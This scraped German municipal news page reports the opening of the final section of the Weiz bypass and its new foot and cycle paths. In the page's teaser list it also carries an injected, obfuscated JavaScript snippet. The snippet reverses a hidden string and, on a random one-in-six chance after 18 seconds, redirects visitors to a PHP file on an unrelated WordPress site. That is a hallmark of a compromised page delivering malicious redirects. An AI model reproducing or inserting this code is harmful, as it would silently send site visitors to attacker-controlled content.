Letzter Teilabschnitt der ODF 3a freigegeben

DSC05020_web
ODF 2: Finanzierung gesichert
13. Juni 2017
radmanns$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dorfg_rgb
Neue Verkehrsregelung in der Innenstadt
28. September 2017
192.168.1.61_01_20170721094805109
Mit Abschnitt 4 des Projektes Ortsumfahrung Weiz/Teil 3a wird dessen letztes Stück endlich für den Verkehr freigegeben. Zwischen der Fußgängerbrücke beim Bahnhof und der Birkfelder Straße stellt dieser Abschnitt bereits das Anschlussstück zu Teilabschnitt 2 der Ortsumfahrung dar.

Die Geh- und Radwege der Kapruner Generator Straße bzw. Birkfelder Straße werden in diesem Abschnitt weiter Richtung Süden geführt. Einerseits wird an der Ostseite der Fahrbahn in Bereich des alten Bauhof-Areals ein durchgehender Geh- und Radweg in einer Breite von drei Metern bis zur Franz-Pichler-Straße angebunden. An der Westseite dieses Abschnittes wird ebenfalls eine Anbindung der bestehenden Geh- und Radwege zum Bahnhof hergestellt.